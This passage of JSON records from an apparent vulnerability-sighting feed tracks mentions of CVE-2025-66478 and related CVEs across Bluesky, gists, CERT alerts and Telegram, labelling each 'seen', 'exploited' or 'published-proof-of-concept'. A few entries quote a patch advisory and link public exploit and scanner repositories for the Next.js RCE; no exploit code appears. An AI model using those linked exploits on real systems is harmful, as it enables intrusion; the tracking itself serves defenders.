"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3m7t4w3mulc2f", "content": "", "creation_timestamp": "2025-12-12T22:24:13.915869Z"}, {"uuid": "3ccb920d-44bd-4100-adf9-b4ac675111b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3m7tjyvczmp23", "content": "", "creation_timestamp": "2025-12-13T02:18:18.764688Z"}, {"uuid": "ceaf3f1b-d3e7-48ad-82cc-264cfb7d9b52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/netmarkjp.bsky.social/post/3m7tm3zio2d26", "content": "", "creation_timestamp": "2025-12-13T02:55:51.022408Z"}, {"uuid": "609ff643-6773-439c-bda9-5e374d9a3726", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/themadarchitect/97f2aee0cd5b0258f803cbbde074abe1", "content": "", "creation_timestamp": "2025-12-14T19:30:00.000000Z"}, {"uuid": "2fb61096-6cda-4c69-8b1d-f44b34564408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/themadarchitect/ea82a060024373a2f5d5b54f9860149c", "content": "", "creation_timestamp": "2025-12-14T19:32:06.000000Z"}, {"uuid": "d851fe5f-45c4-4d9a-ab94-6f89f3901831", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/thecascading.bsky.social/post/3mao2tfm46f2f", "content": "", "creation_timestamp": "2025-12-23T15:28:40.906387Z"}, {"uuid": "88cada4b-e90b-4268-af12-ed041e06d083", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/cbardin89/4eb81c1bae832e32b05c7475ac33ca2a", "content": "", "creation_timestamp": "2025-12-15T11:59:42.000000Z"}, {"uuid": "8fa89143-9e9b-4d40-9d69-deb98a5b3c72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "e92402ac-b04a-4e73-ad0b-3c8344ca18bd", "vulnerability": "CVE-2025-66478", "type": "exploited", "source": "https://beelzebub.ai/blog/threat-huntinga-analysis-of-a-nextjs-exploit-campaign/", "content": "", "creation_timestamp": "2025-12-15T14:06:07.904176Z"}, {"uuid": "67fb5ddc-e11a-43be-8d18-67d5f2f4cf33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/cbardin89/256e142d3cef52eae89581fd02faff48", "content": "", "creation_timestamp": "2025-12-16T02:23:45.000000Z"}, {"uuid": "05b488f7-2fe2-4f1f-9f26-dae7253e47d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3maazrcf7vk2t", "content": "", "creation_timestamp": "2025-12-18T11:05:02.775203Z"}, {"uuid": "91ef11cf-fb8a-4e21-bd8b-90138e65ad29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/ThemeHackers/c6223a6ac26b5ce2c1b070c7118b7f4b", "content": "", "creation_timestamp": "2025-12-18T11:07:09.000000Z"}, {"uuid": "01ce8663-3cd5-416b-bfbf-71c083a0dee8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/hacker-news-jp.bsky.social/post/3maav7jmo262p", "content": "", "creation_timestamp": "2025-12-18T09:43:28.926873Z"}, {"uuid": "d9eb8173-271b-40a4-ba3d-eca329e303f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3majo3swwqf2i", "content": "", "creation_timestamp": "2025-12-21T21:30:05.548655Z"}, {"uuid": "26fff83f-2076-45a3-b478-1bb34ef94923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3marfvlm6uc26", "content": "", "creation_timestamp": "2025-12-24T23:24:48.496082Z"}, {"uuid": "7f671f07-93b5-41b3-b120-957517bdc8ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/opsmatters.com/post/3map5l6uilk2m", "content": "", "creation_timestamp": "2025-12-24T01:50:26.348379Z"}, {"uuid": "47f6d16f-2517-41a8-9c1f-a6d888e47a73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-e40d4570-989b88cdb94f7d04", "content": "", "creation_timestamp": "2025-12-24T13:07:59.066612Z"}, {"uuid": "0c462dae-fbac-4066-a986-5ab3a74e810a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/5922961", "content": "", "creation_timestamp": "2026-03-04T01:42:20.956661Z"}, {"uuid": "df435f77-dd6f-4d2b-8420-adc6faa9a996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/concisecyber.bsky.social/post/3maveicurkb2u", "content": "", "creation_timestamp": "2025-12-26T13:10:05.004694Z"}, {"uuid": "7a3737a8-3853-4791-9028-885e7c8579df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mccizekqyg2g", "content": "", "creation_timestamp": "2026-01-13T12:01:00.021228Z"}, {"uuid": "499af9e9-0a55-4a58-9f55-c187a61133fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/lucasjarman/4a3a6e8a06949d49b52b8372bdd656b8", "content": "", "creation_timestamp": "2026-01-02T00:10:40.000000Z"}, {"uuid": "c219acf7-7950-4957-b584-5112c048c7d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://gist.github.com/apps-dfir/b327a8490587e7cefbc2beaa8ed7cd83", "content": "", "creation_timestamp": "2026-01-06T02:46:23.000000Z"}, {"uuid": "68c19a6e-6745-40b6-bb11-e9d40bf1cc15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3mcc4awlc4e2g", "content": "", "creation_timestamp": "2026-01-13T08:12:34.932270Z"}, {"uuid": "2728bc1e-a9a9-4c62-b9a9-ec0543900b6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://bsky.app/profile/Ubuntu.activitypub.awakari.com.ap.brid.gy/post/3mcc4bdvato32", "content": "", "creation_timestamp": "2026-01-13T08:19:34.043188Z"}, {"uuid": "f6eb2b8f-bd8a-4617-956b-d076ba359405", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mbikve7ovs2q", "content": "", "creation_timestamp": "2026-01-03T04:25:23.869388Z"}, {"uuid": "3a93c412-cb97-47e8-86cd-613c6e18df0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1695", "content": "", "creation_timestamp": "2025-12-04T04:00:00.000000Z"}, {"uuid": "72388074-44e2-4e9b-90de-cbe6c82fced2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66472", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3mckypdzmrk2f", "content": "", "creation_timestamp": "2026-01-16T21:03:04.419392Z"}, {"uuid": "b84fb3e9-64b4-406e-b2a2-1d59bc6190cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66472", "type": "confirmed", "source": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2025/CVE-2025-66472.yaml", "content": "", "creation_timestamp": "2026-01-15T17:42:55.000000Z"}, {"uuid": "f9854443-bdc5-4f56-8074-b0b4f4ac938f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/rodmanr90/c2b227c499a13bd0f01216f49910fffa", "content": "", "creation_timestamp": "2026-03-30T05:05:43.000000Z"}, {"uuid": "6874a097-9563-423c-92f3-58fc7ccf2b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/rodmanr90/bf5af90ca145f002503f4c135d5cfb48", "content": "", "creation_timestamp": "2026-03-30T05:09:16.000000Z"}, {"uuid": "964a3033-576e-4011-8d17-9f98379e52a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://bsky.app/profile/mdsiaofficial.bsky.social/post/3mdi5vvrhs423", "content": "", "creation_timestamp": "2026-01-28T11:23:23.099337Z"}, {"uuid": "5b72f019-78cc-4877-81ec-5012beb1365f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/6739b288-995a-4f1a-9f03-5d1ced3a8fbd", "content": "", "creation_timestamp": "2025-12-05T13:54:28.321487Z"}, {"uuid": "a33a0c28-f66c-44b1-a006-be0791e6dd0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "74ae6031-1dd5-453e-848a-31310bde7d24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2025-66471", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/bbcbc485-b88d-4831-b8e9-6e37e7bd9875", "content": "", "creation_timestamp": "2026-01-21T21:18:16.771453Z"}, {"uuid": "79eabee0-680d-4d3d-bf26-9b68b99e59b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://gist.github.com/alon710/8880e1a57cbe26b13c1b542f0caca514", "content": "", "creation_timestamp": "2026-01-24T22:43:09.000000Z"}, {"uuid": "7d20bad6-4194-451e-b24e-2ecda5f29c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/BTHsSew0OOPVla7Fug7qGoG3AE-1VE1U7EN66KPazST-e4k", "content": "", "creation_timestamp": "2025-12-03T21:00:04.000000Z"}, {"uuid": "4a9f6319-5efe-4d8c-bd45-b203fb391eff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/qJ94TH8UxM1mvjtBkVVanzfaRAufPLEJcbQaT_g-CgcLSXM", "content": "", "creation_timestamp": "2025-12-09T21:00:05.000000Z"}, {"uuid": "bb7f660e-a113-44f5-9704-5eed7d8d499f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66470", "type": "published-proof-of-concept", "source": "Telegram/0R1sh6yT_M6RpS889fQ8OVezlutCC6wifTf5dIyVUqSNUZo", "content": "", "creation_timestamp": "2025-12-11T21:00:06.000000Z"}, {"uuid": "0b42277c-42d2-4341-a6cc-d46efc2656e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "https://t.me/alexmakus/5519", "content": "A critical vulnerability in React Server Components (CVE-2025-55182) has been responsibly disclosed. It affects React 19 and frameworks that use it, including Next.js (CVE-2025-66478).\nIf you are using Next.js, every version between Next.js 15 and 16 is affected, and we recommend immediately updating to the latest Next.js versions containing the appropriate fixes (15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7).\nIf you are using another framework using Server Components, we also recommend immediately updating to the latest React versions containing the appropriate fixes (19.0.1, 19.1.2, and 19.2.1).\n\nhttps://nextjs.org/blog/CVE-2025-66478", "creation_timestamp": "2025-12-04T18:06:57.000000Z"}, {"uuid": "add3bfa3-6760-46fe-84a7-3667c5a2e643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61727", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aExploit for CVE-2025-55182 & CVE-2025-66478\nURL\uff1ahttps://github.com/pyroxenites/Nextjs_RCE_Exploit_Tool\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-12-05T05:13:39.000000Z"}, {"uuid": "381b3c1e-edb3-4775-a201-07674181e669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "Telegram/K3gfJ0htkoL8cQ2e7JVbfDjgCCuWVQp6-Td28FoHMkz28CgCz1g", "content": "", "creation_timestamp": "2025-12-23T17:34:03.000000Z"}, {"uuid": "971343e8-7369-4f82-a9c8-d552d4ced85c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/7OAP4qvqnpmykPakP7KF22peyDavdJkyd9bUGcFodRq9Ywo", "content": "", "creation_timestamp": "2025-12-13T15:00:10.000000Z"}, {"uuid": "eef11d47-cd4c-442b-8181-2dcb09cad5c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61935", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-55182 & CVE-2025-66478 Detection Tool for Next.js RSC RCE\nURL\uff1ahttps://github.com/alessiodos/react2shell-scanner\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T15:24:40.000000Z"}, {"uuid": "51d2403f-64c7-4e1e-b245-954952d8fe67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/61916", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aAWS Organization-wide detection toolkit for CVE-2025-55182 & CVE-2025-66478 (React Server Components / Next.js RCE vulnerabilities)\nURL\uff1ahttps://github.com/rocklambros/React2Shell_Hunter\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-06T14:51:46.000000Z"}, {"uuid": "d55c3053-5a17-44a3-8447-6b66f48ec64c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2025-66478", "type": "seen", "source": "https://gist.github.com/gmoigneu/e9982122600e5c6f6f995d754ca2529f", "content": "", "creation_timestamp": "2026-04-01T08:58:58.000000Z"}, {"uuid": "3346323c-ce46-47c5-bade-7ca2dd477f78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/z0vXOWMFVQaAOAN1-WiP7rDRLn_Bo72aFeI_CtQiT8yb6ko", "content": "", "creation_timestamp": "2025-12-15T09:00:05.000000Z"}, {"uuid": "bf954cb2-8a87-4968-982b-6ae361587c72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/6ozsUPZBjsDLdZG63vMadgqko_WpCCgDVLV4ovLlz1dO__U", "content": "", "creation_timestamp": "2025-12-07T03:00:05.000000Z"}, {"uuid": "943145ad-cfba-42e9-888b-9a5e4f3a9f8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/0R1sh6yT_M6RpS889fQ8OVezlutCC6wifTf5dIyVUqSNUZo", "content": "", "creation_timestamp": "2025-12-11T21:00:06.000000Z"}, {"uuid": "e0778c6f-356a-472a-8530-6fc397bd3d07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62136", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aULTIMATE REACT4SHELL EXPLOITATION FRAMEWORK CVE-2025-55182 & CVE-2025-66478 Ready\nURL\uff1ahttps://github.com/C00LN3T/React4Shell\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-08T08:26:56.000000Z"}, {"uuid": "a39d40dc-592e-43e3-b73f-c316e844370c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/U7Gc3NxFyuS1h8ip8ovtQgVfFrulPi3hjuxXdiIRUt4Lx9U", "content": "", "creation_timestamp": "2025-12-31T07:00:12.000000Z"}, {"uuid": "a9d13953-fda0-43f7-a483-9165a21fae29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/kmdOMxkNOmEREjunn-75FtIRjvIZPZNF95d8rgfXMKj0fP8", "content": "", "creation_timestamp": "2025-12-09T03:37:09.000000Z"}, {"uuid": "2bd73703-2461-499c-ba64-da507697bf0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/62255", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aDetect CVE-2025-55182 & CVE-2025-66478 in Next.js/RSC applications (Rust)\nURL\uff1ahttps://github.com/ancs21/react2shell-scanner-rust\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-12-09T04:31:26.000000Z"}, {"uuid": "74199e10-b7f5-4013-b268-f62daabfbfec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/L38WC5Z6StDAbVGWur3J1et47qVqp8n45yINKLUpuArTxNY", "content": "", "creation_timestamp": "2025-12-23T15:00:07.000000Z"}, {"uuid": "4d51a121-3d72-4ce6-8bb8-76e8cf30bea3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/-ROXHOfm423XBCCWwhXYaLXGn7xm45QaWmgGH9Ytq2x4Q_M", "content": "", "creation_timestamp": "2025-12-18T09:00:05.000000Z"}, {"uuid": "ed7c4d48-9a46-44bb-887e-e6e700c1492f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/-SheSx5ksKpdA3MDPZPaYuWsFtJr9IdvewaeEwjO0RnecSM", "content": "", "creation_timestamp": "2025-12-05T09:00:05.000000Z"}, {"uuid": "2ad9d087-a038-4ae3-9928-3a5ccf3b9035", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/GFK7iRP-YRfUisfPB-meWn-WL3QJHLEcpUZ2wQtZdLdd_6s", "content": "", "creation_timestamp": "2025-12-07T21:00:05.000000Z"}, {"uuid": "a7b52da9-17d4-4819-a2d1-8df8ac554a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/z917lPoY4z2i6pdf0d-zy8JTrnC7jL9Rrjt0jECLqNamFjY", "content": "", "creation_timestamp": "2025-12-12T21:00:07.000000Z"}, {"uuid": "e567d65d-2401-454f-9be9-5e63165d7a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/lFMI9sHHQmIpqwv4gxayNw_2Q7P_ACMYEG5jiG6SWvraLfc", "content": "", "creation_timestamp": "2025-12-13T03:00:05.000000Z"}, {"uuid": "547651d3-a43d-4bb0-9811-49f963249115", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/I4QXvTJeRDV5NcpIh8IerA_QNnV17BE-kDbczPJ6Liofbic", "content": "", "creation_timestamp": "2025-12-14T03:00:05.000000Z"}, {"uuid": "c8219930-3e32-47a4-b091-838baeb54fb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "seen", "source": "Telegram/CYiC6KAcAfm621pl2BFit5z4KE78wCCTVrL0xQPEoHOnJlw", "content": "", "creation_timestamp": "2025-12-30T21:00:05.000000Z"}, {"uuid": "e13a7de6-e60c-49fa-a440-8b4c9818637d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/I-KMl-VM-m1GjAHEWWQ8aP3mX4MIDs3Gzao9kI6rvEgKQrI", "content": "", "creation_timestamp": "2025-12-14T21:00:05.000000Z"}, {"uuid": "c97b44e3-6a86-4424-a330-1117db8d67b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/HZ3ZJRsPXN2xbtsA1DCWruuU-3EwXxx0KgUeziJX8Cuevwg", "content": "", "creation_timestamp": "2025-12-10T21:00:05.000000Z"}, {"uuid": "e9d13ddb-d561-4e50-a01a-20b5ee220432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/xl6r7s1V6prgTvHQQkz3tvs73-QiXmDpD7A2_jD8dQ_9ql0", "content": "", "creation_timestamp": "2025-12-06T09:00:04.000000Z"}, {"uuid": "82a5314c-7e61-4394-909b-81ed7306d46e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/-BSo0zA61vWCA4Jhqv9IkIbnyI3oU0cuabSJHE6-K1C6zFk", "content": "", "creation_timestamp": "2025-12-19T15:05:16.000000Z"}, {"uuid": "6c9aa365-693f-4a30-b4b5-87b4f060d40b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/uvU3gBnf9Z1WMovVGRRTdFZDjWMl1qRCMdPMKGqSGuqnW3I", "content": "", "creation_timestamp": "2025-12-06T15:00:08.000000Z"}, {"uuid": "9217b22e-cadb-4d39-b454-3b66844f5557", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-66478", "type": "published-proof-of-concept", "source": "Telegram/OFDS-V5GchFxSHSlxkXD8547dMzEiee-6K9o15_J1_UpHM0", "content": "", "creation_timestamp": "2025-12-09T03:00:06.000000Z"}, {"uuid": "48b285f7-ab1b-48a9-a7ad-ea3a0888e8c6", "vulnerability_lookup_origin": 